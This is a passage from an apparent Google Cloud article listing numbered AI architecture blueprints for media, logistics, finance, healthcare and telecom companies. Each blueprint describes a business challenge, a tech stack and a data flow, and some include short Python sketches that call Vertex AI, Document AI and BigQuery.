Business challenge: You’re a company creating AI-powered video content, such as digital avatars or automated news reports. Your challenge is the immense computational power required to render high-quality video quickly, which can create a bottleneck and slow down your entire production pipeline.
Tech stack: Cloud GPUs (or TPUs), Google Kubernetes Engine (GKE), Google Cloud Storage.
Blueprint: A user submits a script and selects a digital avatar for a new video. ➝ The request is sent to a rendering application running on a GKE cluster. ➝ GKE automatically scales up a pool of nodes equipped with powerful Cloud GPUs. ➝ The GPUs work in parallel to process the AI models and render the video frames at high speed. ➝ Once rendering is complete, the final video file is saved to Google Cloud Storage, and the GPU-powered nodes scale down automatically, optimizing for both speed and cost.
21. Create a recommendations experience
Business challenge: You’re a major broadcaster with a huge catalog of content, from live sports to soap operas. Your challenge is to keep viewers engaged by surfacing content that is personally relevant to them from across your entire diverse portfolio, rather than just showing them what’s popular.
Blueprint: Real-time viewer interaction data streams into a Dataflow pipeline, which processes the events and updates viewer profiles in BigQuery. ➝ The unified viewer data in BigQuery is used to train a Vertex AI Search model. ➝ When a viewer opens the streaming app, a request is sent to a service on Cloud Run. ➝ The service queries the Vertex AI Search model with the viewer’s ID. ➝ The model returns a personalized list of content, such as “Because you watched the soccer match, you might also like this sports documentary,” creating a highly engaging and personalized experience.
These architectural blueprints are inspired by customers who are using AI in the automotive and logistics industry, such as: Volkswagen of America, PODS, Uber, UPS, BMW Group, and more.
22. Build an AI-powered interactive owner’s manual
Business challenge: You’re an automaker or manufacturer of complex products. Your challenge is that traditional paper owner’s manuals are cumbersome, difficult to search, and rarely used by customers, leading to frustration and increased calls to support centers for simple questions.
Tech stack: Vertex AI, AlloyDB for PostgreSQL, Cloud Run, Google Cloud Storage
Blueprint: All owner’s manual content is processed and chunked into vector embeddings, which are stored in AlloyDB. ➝ When a driver asks a question in the app, like “How do I change a flat tire?”, the query is sent to a service on Cloud Run. ➝ For multimodal queries, the user points their phone’s camera at a dashboard light; the image is sent to Vertex AI Vision to identify it, and this information is added to the query. ➝ The service finds the most relevant manual sections from AlloyDB and sends them, along with the user’s question, to Gemini, which generates a clear, conversational answer.
23. Monitor real-time audio for in-transit safety alerts
Business challenge: You’re a transportation or logistics company responsible for the safety of thousands of drivers and passengers every day. Your challenge is reacting to dangerous situations quickly enough, as traditional methods rely on passengers or drivers manually triggering an alarm, which is often too late.
Blueprint: During a trip, audio from the vehicle is streamed in chunks to Pub/Sub. ➝ A Cloud Function is triggered, which sends the audio snippet to the Speech-to-Text API for transcription. ➝ The resulting text is sent to a Gemini model with a prompt like, “Analyze this text for keywords related to distress or hostility (‘robbery’, ‘help’). Return a ‘Red’ alert if found, otherwise ‘Green’.” ➝ If a ‘Red’ alert is returned, the system automatically notifies a central security dashboard with the trip details and vehicle location.
24. Deploy dynamic, location-aware digital advertising
Business challenge: Your company has a large mobile physical presence (like a fleet of trucks) and you want to move beyond displaying static logos. Your challenge is creating advertising that is hyper-relevant and context-aware, to capture the attention of people in specific neighborhoods with unique messaging.
Blueprint: A device on a truck periodically sends its GPS coordinates to a service on Cloud Run. ➝ The service calls the Google Maps Geocoding API to identify the current neighborhood and queries BigQuery for demographic or local interest data associated with that area. ➝ These details are used to construct a prompt for Gemini, such as “Create a witty, 10-word billboard headline for a moving company in a neighborhood known for its young families and parks.” ➝ Gemini returns multiple headline options, and the service displays the best one on the truck’s digital billboard in real time.
25. Build a productivity agent for customer service teams
Business challenge: You’re a large enterprise with a customer service team that handles thousands of interactions daily. Your agents spend significant time writing summaries instead of focusing on high-quality problem-solving.
Tech stack: Vertex AI, BigQuery, Cloud Functions
Blueprint: All customer service interactions (chats, emails) are stored in a central data store like BigQuery. ➝ When an agent opens a new ticket, a Cloud Function is triggered. ➝ The function retrieves the customer’s entire interaction history from BigQuery and sends it to Gemini with a prompt like, “Summarize the key issues from this customer’s past 5 interactions and list their current sentiment.” ➝ The concise summary appears directly in the agent’s CRM, allowing them to understand the full context in seconds and provide a more effective and empathetic response.
26. Analyze large-scale telematics data for fleet optimization
Business challenge: You’re a global logistics or telematics company managing millions of connected vehicles. Your challenge is processing the immense volume of daily data points that can help you improve fleet efficiency, driver safety, and sustainability.
Tech stack: BigQuery, Vertex AI, Looker
Blueprint: Billions of data points from millions of vehicles stream directly into BigQuery daily. ➝ BigQuery ML uses that data to train models directly within the data warehouse to identify patterns related to fuel consumption, unsafe driving habits, or optimal routing. ➝ The models run continuously, analyzing new data as it arrives and outputting insights such as “vehicles on Route 88 are experiencing 15% higher fuel consumption due to traffic patterns.” ➝ These insights are visualized in a Looker dashboard, allowing fleet managers to make informed decisions on routing, driver training, and vehicle maintenance.
27. Create an AI-powered supply chain risk intelligence platform
Business challenge: You’re a global enterprise with a complex, multi-tiered supply chain. Your challenge is a lack of visibility into potential disruptions — from financial instability and labor issues to geopolitical events — deep within your supplier network, putting you at risk of costly delays and compliance failures.
Tech stack: Gemini, Pub/Sub, BigQuery
Blueprint: The system continuously ingests data from public sources (news, social media, financial reports) via Pub/Sub. ➝ This data, along with a company’s internal supplier data, is stored and processed in BigQuery. ➝ Gemini models analyze the unstructured text data, performing sentiment analysis and entity recognition to identify potential risks associated with specific suppliers (e.g., “news reports indicate labor strikes at Factory X”). ➝ The system generates a risk score for each supplier, which is updated in real-time on a dashboard, alerting managers to potential disruptions before they impact the supply chain.
28. Build a digital twin of your distribution network
Business challenge: You’re a logistics and shipping company operating a vast, complex network of vehicles, warehouses, and sorting facilities. Your challenge is a lack of a single, real-time view of your entire operation, making it difficult to optimize routes, predict delays, and provide customers with accurate tracking information.
Tech stack: Pub/Sub, Dataflow, BigQuery, Vertex AI, Google Maps Platform
Blueprint: IoT sensors on packages, vehicles, and in facilities stream real-time location and status data to Pub/Sub. ➝ A Dataflow pipeline processes this massive stream of data, cleansing and structuring it before loading it into BigQuery. ➝ Vertex AI models use this historical and real-time data to run thousands of simulations, predicting potential bottlenecks and optimizing routes. ➝ The entire network state is visualized on a Google Maps Platform interface, creating a “digital twin” that allows operators to see the entire network at a glance and customers to track their packages with pinpoint accuracy.
29. Optimize industrial planning with 3D digital twins
Business challenge: You’re a manufacturer with complex factory layouts and supply chains. Your challenge is that optimizing facility design, production line flow, or warehouse logistics is incredibly difficult and expensive to test in the physical world.
Tech stack: Vertex AI, a 3D modeling engine, Google Cloud Storage
Blueprint: Factory assets are scanned using mobile devices or drones, capturing thousands of images. ➝ The images are uploaded to Google Cloud Storage and processed by Vertex AI Vision models to identify objects and their dimensions. ➝ This structured data is fed into a 3D modeling engine to create a photorealistic digital twin of the facility. ➝ Planners can then use this digital twin to run thousands of simulations with Gemini, asking questions like “What is the most efficient path for a robot to move from station A to station B?” to optimize processes virtually before committing to expensive physical changes.
30. Bring your employees up to speed on AI
Business challenge: You’re a manufacturing company with a wealth of operational knowledge about the factory floor, but your expert workers lack the coding skills to build AI solutions. Your challenge is making it easy for your frontline teams to solve their own problems with AI, so they can improve efficiency and quality control.
Tech stack: Vertex AI, BigQuery, a simplified user interface (e.g., built on App Engine)
Blueprint: Factory sensor and quality control data is collected and stored in BigQuery. ➝ A simple, no-code user interface is created where a factory worker can select a dataset and define a goal, such as “Predict which parts are likely to have a defect based on these sensor readings.” ➝ The interface calls the Vertex AI AutoML API, which automatically trains, tests, and deploys a custom machine learning model without the worker writing any code. ➝ The deployed model can then be used in real-time on the production line to flag potential issues, directly improving efficiency.
31. Build an AI-powered sales assistant for e-commerce
Business challenge: You’re a retailer with a sophisticated online storefront. Your challenge is that customers often have nuanced questions or need guidance that a simple search bar or FAQ can’t provide, leading to abandoned carts and missed sales opportunities.
Tech stack: Vertex AI, BigQuery, Cloud Run
Blueprint: Your entire product catalog and customer interaction history are indexed from BigQuery into Vertex AI Agent Builder. ➝ When a customer interacts with the chat assistant on your website, their query is sent to a service on Cloud Run. ➝ The service uses the Agent Builder to understand the user’s intent and retrieve relevant product information. ➝ For complex or conversational queries, the retrieved information is passed to Gemini with a prompt like, “A customer is asking for a durable, family-friendly car. Based on these three models, explain which is the best fit and why.” ➝ Gemini generates a helpful, conversational response that guides the customer to the right product, increasing conversion.
These architectural blueprints are inspired by customers who are using AI in the financial services industry, such as: Bud Financial, Deutsche Bank, Discover Financial, Scotiabank, and more.
32. Automate banking tasks with a financial LLM
Business challenge: You’re a neobank or financial institution serving a digitally native customer base. Your challenge is that customers expect intelligent and proactive service that traditional banking workflows can’t provide, such as automatically preventing an overdraft.
Blueprint: Real-time transaction data streams into Pub/Sub and is analyzed by a Cloud Function ➝ If a potential overdraft is detected, the function calls a fine-tuned Gemini model (a Financial LLM) with a prompt like, “This user is about to overdraft. Based on their account history, suggest the best action.” ➝ Gemini might respond with, “Move $50 from their ‘Savings’ account.” ➝ The system can then either automatically execute the transfer or send a proactive notification to the user, preventing the fee and improving their financial health.
33. Create an AI mortgage agent to personalize quotes
Business challenge: You’re a digital mortgage lender in a highly competitive market. Your challenge is that potential borrowers are often comparison shopping and will abandon your site if they can’t get a fast, clear, and personalized rate quote without a lengthy application process.
Tech stack: Vertex AI, Cloud Run, a secure document store (e.g., Cloud Storage).
Blueprint: A borrower uses a feature like “Beat this Rate” and uploads a competitor’s quote sheet to Cloud Storage. ➝ The document is sent to a service on Cloud Run, which calls a multimodal Gemini model. ➝ Gemini extracts the key terms (rate, points, term length) from the document. ➝ The service uses this data to query internal rate tables and constructs a new prompt for Gemini, such as “Create a comparison table and a friendly chat message showing how our 2.95% rate is better than this competitor’s 3.15% rate.” ➝ The personalized quote and comparison are displayed to the borrower in seconds.
34. Build an AI agent to enhance wealth management advisory
Business challenge: You’re a wealth management firm where financial advisors spend significant time on administrative tasks like writing call summaries. Your challenge is freeing up advisors from this manual work so they can focus on high-value client relationship building and strategic advice.
Tech stack: Speech-to-Text API, Vertex AI, a CRM system.
Blueprint: During a client call, the audio is transcribed in real-time by the Speech-to-Text API. ➝ After the call, the full transcript is sent to a Gemini model with a prompt like, “Summarize this financial advisory call. Identify key client concerns, action items for the advisor, and update the client’s financial goals.” ➝ Gemini generates a structured summary and a list of action items. ➝ This summary is automatically logged into the firm’s CRM system, saving the advisor significant time and ensuring a consistent record of every interaction.
35. Accelerate underwriting with AI-powered document analysis
Business challenge: You’re a mortgage lender or broker dealing with thousands of loan applications. Your challenge is the slow, manual process of underwriting, where humans must read through complex financial documents, leading to long closing times and high operational costs.
Blueprint: A broker uploads a borrower’s financial documents (pay stubs, bank statements) to a portal. ➝ A service on Cloud Run sends the documents to Document AI to extract and structure all the raw data (income, assets, debts). ➝ The structured data is stored in BigQuery and sent to a Gemini model with a prompt like, “Analyze this borrower’s financial data against our underwriting guidelines and flag any potential risks.” ➝ The model returns a risk analysis, allowing a human underwriter to make a final decision in minutes instead of hours, dramatically increasing productivity.
36. Automate international transfers via a chat interface
Business challenge: You’re a financial institution specializing in currency exchange. Initiating international transfers often requires customers to navigate complex online forms or visit a branch during business hours, creating a slow and inconvenient experience.
Tech stack: A chat platform API, Dialogflow CX (or Vertex AI Conversation), Cloud Functions.
Blueprint: A customer starts a conversation and says, “I want to send $500 to my brother in the UK.” ➝ The message is sent to a Dialogflow CX agent, which is trained to handle transfer requests. ➝ The agent asks clarifying questions (e.g., “What is the recipient’s bank information?”). ➝ Once all the necessary information is collected, Dialogflow calls a secure Cloud Function. ➝ The Cloud Function executes the transfer via the bank’s core systems and sends a confirmation message back to the customer through the chat interface, completing the entire transaction 24/7 without human intervention.
37. Build an AI research assistant for financial analysts
Business challenge: You’re a financial institution where analysts spend hours, or even days, gathering data and synthesizing information to produce research reports. Your challenge is accelerating this process to deliver more timely insights to clients while maintaining the highest standards of data privacy.
Tech stack: Vertex AI, BigQuery.
Blueprint: A financial analyst uses an internal research tool and gives it a prompt like, “Draft a research note on the semiconductor industry’s Q3 performance, focusing on supply chain trends and key player earnings.” ➝ The tool queries internal, proprietary datasets in BigQuery and external, approved market data sources using Vertex AI Search. ➝ The retrieved data is passed to a Gemini model with a detailed prompt to generate a draft report. ➝ The model produces a structured draft with key insights, charts, and summaries, allowing the analyst to refine and finalize the report in minutes instead of days.
38. Automate insurance claims processing with multimodal AI
Business challenge: You’re an insurance provider, and your claims process relies on adjustors manually reviewing various documents (photos, repair estimates, police reports). This is slow, error-prone, and leads to a poor customer experience during a stressful time.
Tech stack: Document AI, Vertex AI, Cloud Run.
Blueprint: A claimant uploads all their documents and photos for a claim. ➝ A service on Cloud Run sends text documents to Document AI and images to Vertex AI Vision to extract and structure all relevant information. ➝ This structured data is then passed to a Gemini model with a prompt like, “Based on this police report, repair estimate, and photos of the damage, is this auto claim valid under policy #12345? Calculate the estimated payout.” ➝ The model returns a validation decision and payout amount, allowing simple claims to be settled in near real-time.
39. Build an AI agent to extract data from legal documents
Business challenge: You’re a financial advisory or wealth management firm. Your challenge is the time-consuming and highly manual process of reading through lengthy, complex legal documents like wills and trusts to extract key information for estate planning.
Tech stack: Document AI, Vertex AI.
Blueprint: A financial advisor uploads a client’s lengthy trust document (a PDF). ➝ The document is processed by Document AI to extract all the raw text while preserving its structure. ➝ The extracted text is then sent to a fine-tuned Gemini model with a prompt like, “From this trust document, extract the beneficiaries, trustees, asset distribution rules, and any specific conditions for inheritance.” ➝ The model returns the key information in a structured format (like JSON), which can be used to automatically populate the client’s profile in the planning platform, saving the advisor hours of manual reading.
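One possible shape for the extraction step, assuming a Document AI OCR processor already exists; the project, location, processor ID, and model name are placeholders, and the JSON schema in the prompt is illustrative.

```python
# Sketch: OCR a trust document with Document AI, then ask Gemini for structured JSON.
import vertexai
from google.cloud import documentai_v1 as documentai
from vertexai.generative_models import GenerationConfig, GenerativeModel

PROJECT, DOCAI_LOCATION, PROCESSOR_ID = "my-project", "us", "my-processor-id"  # placeholders


def extract_trust_terms(pdf_bytes: bytes) -> str:
    # 1) Extract the raw text while preserving structure.
    docai = documentai.DocumentProcessorServiceClient()
    name = docai.processor_path(PROJECT, DOCAI_LOCATION, PROCESSOR_ID)
    result = docai.process_document(
        request=documentai.ProcessRequest(
            name=name,
            raw_document=documentai.RawDocument(
                content=pdf_bytes, mime_type="application/pdf"
            ),
        )
    )

    # 2) Ask Gemini for the key terms as JSON.
    vertexai.init(project=PROJECT, location="us-central1")
    model = GenerativeModel("gemini-1.5-pro")
    prompt = (
        "From this trust document, extract the beneficiaries, trustees, "
        "asset distribution rules, and any specific conditions for inheritance. "
        "Return JSON only.\n\n" + result.document.text
    )
    response = model.generate_content(
        prompt,
        generation_config=GenerationConfig(response_mime_type="application/json"),
    )
    return response.text  # JSON string ready to populate the planning platform
```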
40. Turn project tickets into code with AI
Business challenge: You’re a software company in a regulated industry, and your developers spend significant time translating bug reports or feature requests from project management tickets into actual code, slowing down the development cycle.
Tech stack: Vertex AI, a project management tool API (e.g., Jira).
Blueprint: When a new bug ticket is created in Jira, a webhook triggers a service. ➝ The service retrieves the ticket’s description, which details the bug (e.g., “The ‘export’ button is not working on the user dashboard for accounts in ‘pending’ status.”). ➝ This description is used to construct a detailed prompt for Gemini Code Assist, which has been trained on the company’s private codebase. ➝ The prompt is, “Given our codebase, write the Python code to fix the bug described in this ticket.” ➝ The model generates a code snippet or a pull request with the suggested fix, which a developer can then review, test, and merge, significantly speeding up the process.
41. Build an anti-fraud and credit analysis engine
Business challenge: You’re a fintech company providing payment solutions or loans. Your challenge is accurately assessing credit risk and detecting fraudulent transactions in real-time to protect both your business and your customers, without slowing down the user experience.
Tech stack: BigQuery, Vertex AI, Dataflow.
Blueprint: Real-time transaction and user behavior data streams through Dataflow and is stored in BigQuery. ➝ Vertex AI machine learning models are continuously trained on this historical data to learn the patterns of both legitimate and fraudulent activity. ➝ When a new transaction occurs, the data is sent to the deployed fraud detection model in real-time. ➝ The model returns a risk score in milliseconds. ➝ If the score is high, the transaction can be automatically blocked or flagged for manual review, preventing fraud before it happens.
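A sketch of the real-time scoring call, assuming a fraud model has already been trained and deployed to a Vertex AI endpoint; the endpoint resource name, feature names, and the single-probability output format are assumptions about how that model was built.

```python
# Sketch: score one transaction against a deployed Vertex AI endpoint in real time.
from google.cloud import aiplatform

aiplatform.init(project="my-project", location="us-central1")  # placeholders
endpoint = aiplatform.Endpoint(
    "projects/my-project/locations/us-central1/endpoints/1234567890"
)


def score_transaction(txn: dict) -> float:
    """Return a fraud risk score, assuming the model outputs one probability per instance."""
    prediction = endpoint.predict(instances=[{
        "amount": txn["amount"],
        "merchant_category": txn["merchant_category"],
        "country": txn["country"],
        "seconds_since_last_txn": txn["seconds_since_last_txn"],
    }])
    return float(prediction.predictions[0])


if __name__ == "__main__":
    risk = score_transaction({"amount": 950.0, "merchant_category": "electronics",
                              "country": "BR", "seconds_since_last_txn": 42})
    if risk > 0.9:
        print("Block transaction and flag for manual review")
```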
These architectural blueprints are inspired by customers who are using AI in the healthcare and life sciences industry, such as: Bayer, Mayo Clinic, Clivi, Orby, Hackensack Meridian Health, and more.
42. Enable personalized and continuous patient monitoring
Business challenge: You’re a healthcare provider managing a large population of patients with chronic conditions like diabetes. Your challenge is that periodic check-ins don’t provide a complete picture of a patient’s health, making it difficult to offer timely, personalized advice or intervene before complications arise.
Tech stack: Pub/Sub, Dataflow, BigQuery, Vertex AI.
Blueprint: Real-time patient data from sources like glucose monitors is streamed to Pub/Sub. ➝ A Dataflow pipeline processes and normalizes the data, storing it in BigQuery against the patient’s record. ➝ The system uses a Vertex AI model to analyze trends, and if an anomaly is detected (e.g., consistently high blood sugar), it triggers an alert. ➝ Gemini then generates a personalized message for the patient, like “We’ve noticed your glucose levels have been high in the evenings. Try a short walk after dinner and let’s see how your numbers look tomorrow.”
43. Build an AI assistant for radiology workflows
Business challenge: You’re a healthcare provider, and your radiologists are facing immense pressure from increasing workloads. Your challenge is helping them analyze complex images, search for relevant prior studies, and create regulatory-compliant reports more efficiently and accurately.
Tech stack: Vertex AI, Google Cloud Healthcare API, PACS system.
Blueprint: A new radiology image is ingested and de-identified via the Healthcare API and stored in a PACS. ➝ The image is sent to a Vertex AI vision model to detect and highlight potential areas of interest. ➝ A radiologist can use Vertex AI Search, which is indexed on millions of prior anonymized studies, to find similar cases. ➝ After review, the radiologist dictates their findings, and Gemini helps draft a structured, compliant report, which is then finalized and logged, freeing up the radiologist to focus on complex diagnostic work.
44. Create a virtual assistant for caregiver shift handoffs
Business challenge: You’re a large healthcare network, and a critical point of failure is the shift change between nurses or caregivers. Your challenge is ensuring that crucial context and patient status details are not lost during this handoff, which can impact the continuity and quality of care.
Tech stack: Speech-to-Text API, Vertex AI, an Electronic Health Record (EHR) system.
Blueprint: As a nurse ends their shift, they speak into a device and summarize their patient’s status. ➝ Speech-to-Text transcribes their summary in real-time. ➝ The transcript is sent to Gemini with a prompt like, “Convert this unstructured shift summary into a structured report with sections for ‘Vitals’, ‘Medication Administered’, ‘Patient Observations’, and ‘Action Items for Next Shift’.” ➝ The structured summary is automatically placed in the patient’s EHR, allowing the incoming caregiver to get a complete and consistent overview in seconds. For a more detailed example, check out this blog.
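A minimal sketch of the transcription-plus-restructuring step, assuming the nurse's audio has already been saved to Cloud Storage as a 16 kHz WAV file; the bucket URI, project ID, and model name are placeholders, and writing the result into the EHR is left out.

```python
# Sketch: transcribe a spoken shift summary, then restructure it with Gemini.
import vertexai
from google.cloud import speech
from vertexai.generative_models import GenerativeModel


def summarize_shift(audio_uri: str) -> str:
    # 1) Transcribe the nurse's spoken summary.
    stt = speech.SpeechClient()
    response = stt.recognize(
        config=speech.RecognitionConfig(
            encoding=speech.RecognitionConfig.AudioEncoding.LINEAR16,
            sample_rate_hertz=16000,
            language_code="en-US",
        ),
        audio=speech.RecognitionAudio(uri=audio_uri),  # e.g. gs://handoffs/room-12.wav
    )
    transcript = " ".join(r.alternatives[0].transcript for r in response.results)

    # 2) Restructure the transcript into the handoff template.
    vertexai.init(project="my-project", location="us-central1")
    model = GenerativeModel("gemini-1.5-flash")
    prompt = (
        "Convert this unstructured shift summary into a structured report with "
        "sections for 'Vitals', 'Medication Administered', 'Patient Observations', "
        "and 'Action Items for Next Shift'.\n\n" + transcript
    )
    return model.generate_content(prompt).text  # this is what gets written to the EHR
```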
45. Accelerate drug discovery with generative protein design
Business challenge: You’re a biotech or pharmaceutical company, and the traditional process of drug discovery is incredibly slow and expensive. Your challenge is finding a way to rapidly design and test novel proteins that could become the basis for new medicines.
Tech stack: Vertex AI, Google Cloud TPUs.
Blueprint: Scientists input the desired properties of a protein (e.g., “Design a protein that binds to target X to inhibit its function”). ➝ This request is sent to a generative AI model running on high-performance TPUs on Google Cloud. ➝ The model, trained on vast biological datasets, generates sequences for thousands of novel proteins that meet the specified criteria. ➝ These AI-designed proteins can then be synthesized and tested in the lab, drastically shortening the initial R&D phase from years to weeks.
46. Automate pharmaceutical documentation and formatting
Business challenge: You’re a pharmaceutical company that deals with a high volume of complex documents, from lab results to FDA compliance paperwork. Your challenge is the time-consuming, manual process of transcribing, formatting, and summarizing this information, which slows down operations.
Tech stack: Gemini for Google Workspace, Document AI.
Blueprint: A lab result arrives as a PDF attachment in an employee’s inbox. ➝ The employee uses Gemini in Gmail with a prompt like, “Extract the key values from this attached lab result and format them into the standard table in this Google Doc template.” ➝ Gemini leverages Document AI capabilities to parse the PDF, extract the structured data, and populate the Google Doc. ➝ This reduces a multi-step manual process into a single command, saving hours per week.
47. Build an AI-enhanced underwriting model for insurers
Business challenge: You’re a commercial insurer, and quoting policies for complex risks requires underwriters to manually assess vast amounts of data, a process that can take days. Your challenge is to automate and accelerate this process to provide faster quotes and gain a competitive edge.
Tech stack: BigQuery, Vertex AI, Cloud Run.
Blueprint: Historical data on leads, quotes, and claims outcomes is stored and processed in BigQuery. ➝ This data is used to train a Vertex AI machine learning model to predict the risk associated with a new lead. ➝ When a new request for a quote arrives, the data is sent to a service on Cloud Run. ➝ The service calls the deployed Vertex AI model, which returns a risk score and a suggested premium in seconds. ➝ This automates the initial assessment, allowing a human underwriter to review the AI-generated quote and make a final decision in minutes instead of days.
48. Build an intelligent search platform for clinical research
Business challenge: You’re a large research hospital or institution with petabytes of valuable clinical data. Your challenge is that this data is often siloed and difficult for researchers to access and analyze, creating a major roadblock to scientific discovery.
Tech stack: Vertex AI Search, BigQuery, Google Cloud Healthcare API.
Blueprint: Petabytes of clinical data are de-identified using the Healthcare API and consolidated into BigQuery. ➝ The entire dataset, including unstructured notes and structured data, is indexed into Vertex AI Search. ➝ A researcher can now use a simple, natural language search bar to ask complex questions like, “Find all patient cohorts over the age of 50 with a history of heart disease who responded positively to drug X.” ➝ Vertex AI Search retrieves the relevant, anonymized records from across the entire 50-petabyte dataset, accelerating research from months to minutes.
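A sketch of the researcher-facing query, assuming a Vertex AI Search data store has already been built over the de-identified records; the serving config path, data store name, and default_config ID are assumptions about how that engine was set up.

```python
# Sketch: run a natural language question against a Vertex AI Search data store.
from google.cloud import discoveryengine_v1 as discoveryengine


def search_cohorts(question: str):
    client = discoveryengine.SearchServiceClient()
    serving_config = (  # placeholder path; depends on how the data store was created
        "projects/my-project/locations/global/collections/default_collection/"
        "dataStores/clinical-notes/servingConfigs/default_config"
    )
    request = discoveryengine.SearchRequest(
        serving_config=serving_config,
        query=question,
        page_size=10,
    )
    for result in client.search(request=request):
        # Each hit references a de-identified record in the indexed dataset.
        print(result.document.id)


search_cohorts(
    "patient cohorts over the age of 50 with a history of heart disease "
    "who responded positively to drug X"
)
```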
49. Predict disease outbreaks with public and private data
Business challenge: You’re a pharmaceutical company or public health organization. Your challenge is to move from reacting to seasonal outbreaks like the flu to proactively predicting them, allowing for better resource planning, vaccine distribution, and public health messaging.
Tech stack: BigQuery, Vertex AI, Google Trends API.
Blueprint: Anonymized, aggregated Google Search trend data (via the Trends API) for terms like “fever” and “cough” is combined with internal historical sales data for flu medication in BigQuery. ➝ A Gemini model is used to analyze these combined datasets to identify correlations and predict future outbreaks on a location-specific basis. ➝ The system generates a forecast, such as “A 20% increase in search traffic for ‘flu symptoms’ in Ohio predicts a spike in cases in 7-10 days,” which is then visualized on a dashboard for real-time healthcare planning.
50. Enhance IVF outcomes with AI-powered embryo analysis
Business challenge: You’re a fertility clinic, and one of the most critical and difficult parts of the IVF process is selecting the embryo with the highest chance of a successful pregnancy. Your challenge is improving the accuracy of this selection process to give patients the best possible outcomes.
Tech stack: Vertex AI, Google Cloud Storage.
Blueprint: High-resolution images of embryos are uploaded to Google Cloud Storage. ➝ A Vertex AI Vision model analyzes the images, extracting hundreds of morphological features that are imperceptible to the human eye. ➝ This feature data, along with the eventual outcome data (successful implantation or not), is used to train an AutoML model. ➝ When analyzing a new patient’s embryos, the model provides a viability score for each one, helping embryologists make a more data-driven decision and increasing the likelihood of a successful IVF cycle.
51. Automate routing and medical order processing for home health
Business challenge: You’re a home health company managing a fleet of nurses who conduct thousands of patient visits. Your challenge is optimizing their daily routes to be as efficient as possible while also speeding up the manual, paper-based process of handling medical orders.
Tech stack: Document AI, Google Maps Platform, Cloud Run.
Blueprint: A patient’s medical order (PDF or image) is uploaded to the system. ➝ A service on Cloud Run sends the file to Document AI, which automatically extracts the patient details, required services, and location. ➝ Each day, the system sends the list of all required visits to the Google Maps Routes API, which calculates the most efficient multi-stop route for each nurse. ➝ The optimized route is sent to the nurse’s mobile app, saving time and fuel, while the automated order processing reduces administrative overhead.
These architectural blueprints are inspired by customers who are using AI in the telecommunication industry, such as: Bell Canada, Verizon, Vodafone, Nokia, Orange, and more.
52. Build a customizable AI contact center solution
Business challenge: You’re a telecommunications provider serving business customers who need to modernize their own customer service. Your challenge is providing a flexible, AI-powered contact center solution that can both handle calls automatically and assist human agents in real-time.
Tech stack: Contact Center AI Platform (CCAI), Vertex AI, a CRM system.
Blueprint: When a customer calls, they are first greeted by an AI-powered agent built on Contact Center AI. ➝ The agent handles common requests, such as checking an account balance. ➝ If the caller needs to speak to a human, the call is transferred. ➝ As the human agent speaks, the “Agent Assist” feature listens to the conversation, transcribes it in real-time, and uses Gemini to provide the agent with relevant knowledge base articles and next-step suggestions directly in their CRM interface.
53. Empower your workforce with generative AI tools
Business challenge: You’re a large telecommunications company, and you want to empower your entire workforce with AI. Your challenge is providing easy access to generative AI tools while maintaining strict security, privacy, and compliance controls over your sensitive company data.
Tech stack: Vertex AI, Identity and Access Management (IAM), Google Cloud Storage.
Blueprint: An internal “AI Sandbox” platform is built using Vertex AI Agent Builder. ➝ The platform is grounded on a curated set of internal company documents (legal, HR, technical docs) stored securely in Google Cloud Storage. ➝ Employees access the sandbox through their corporate identity, with IAM rules ensuring they can only access data they are permissioned to see. ➝ An employee can then ask questions like “Summarize our new data privacy policy” and receive an answer from Gemini that is based solely on the trusted internal documents, democratizing information securely.
54. Automate call summarization and quality assurance
Business challenge: You’re a telecom operator with a large customer service center. Your challenge is ensuring consistent quality and identifying best practices from thousands of daily calls, a task that requires managers to manually listen to a small, random sample of call recordings.
Tech stack: Speech-to-Text API, Vertex AI, BigQuery, Looker.
Blueprint: Audio from all customer service calls is transcribed by the Speech-to-Text API, and the text is stored in BigQuery. ➝ A scheduled job sends the transcripts to Gemini with a prompt like, “Summarize this call, classify the customer’s reason for calling, and rate the agent’s effectiveness based on our quality rubric.” ➝ The structured analysis is written back to BigQuery. ➝ Managers use a Looker dashboard to see trends, identify top-performing agents, and find calls that can be used as examples for team training.
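One way the scheduled job could look, assuming transcripts land in a BigQuery table; the dataset and table names, the rubric wording, and the JSON keys are illustrative.

```python
# Sketch: summarize new call transcripts with Gemini and write the analysis back to BigQuery.
import json
import vertexai
from google.cloud import bigquery
from vertexai.generative_models import GenerationConfig, GenerativeModel

bq = bigquery.Client()
vertexai.init(project="my-project", location="us-central1")  # placeholders
model = GenerativeModel("gemini-1.5-flash")

PROMPT = (
    "Summarize this call, classify the customer's reason for calling, and rate "
    "the agent's effectiveness from 1-5 against our quality rubric. "
    'Return JSON with keys "summary", "reason", "rating".\n\nTranscript:\n'
)

rows_out = []
query = ("SELECT call_id, transcript FROM contact_center.transcripts "
         "WHERE analyzed IS NULL LIMIT 100")  # hypothetical table
for row in bq.query(query).result():
    response = model.generate_content(
        PROMPT + row.transcript,
        generation_config=GenerationConfig(response_mime_type="application/json"),
    )
    analysis = json.loads(response.text)
    rows_out.append({"call_id": row.call_id, **analysis})

# The Looker dashboard reads from this analysis table.
bq.insert_rows_json("contact_center.call_analysis", rows_out)
```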
55. Use AI to analyze complex commercial contracts
Business challenge: You’re a global telecommunications operator with thousands of complex interconnection agreements and vendor contracts. Your challenge is quickly finding specific commercial terms, obligations, or renewal dates buried within these dense legal documents.
Tech stack: Document AI, Vertex AI Search, Vertex AI.
Blueprint: Thousands of contracts are processed by Document AI to extract and structure the raw text, which is then indexed into Vertex AI Search. ➝ A member of the legal or commercial team uses a search interface and asks a natural language question like, “Find all contracts with Operator X that have a termination clause requiring 90 days’ notice.” ➝ Vertex AI Search retrieves the relevant contract sections. ➝ For further analysis, Gemini can be used to compare terms across multiple retrieved documents in a side-by-side table.
56. Build a “network as code” platform for developers
Business challenge: You’re a 5G network operator, and you want to enable developers to create innovative applications that leverage the unique capabilities of your network (e.g., low latency, high bandwidth). Your challenge is abstracting the complexity of the network into simple, programmable APIs.
Tech stack: Vertex AI, Google Kubernetes Engine (GKE), network APIs.
Blueprint: A “Network as Code” platform exposes complex network functions via simple APIs, hosted on GKE. ➝ A developer wants to build a telehealth app that requires a guaranteed high-quality connection for a remote surgery consultation. ➝ They use the platform’s SDK and interact with a Gemini-powered assistant, prompting, “Generate the Python code to request a dedicated, low-latency network slice between the hospital and the patient’s home for the next 60 minutes.” ➝ Gemini generates the necessary code, which calls the platform’s APIs to provision the network resources dynamically.
57. Create a unified customer view for enhanced service
Business challenge: You’re a large telecom provider, and your customer data is fragmented across multiple systems (billing, CRM, network usage). Your challenge is creating a single, 360-degree view of each customer to provide proactive, personalized service and make informed business decisions.
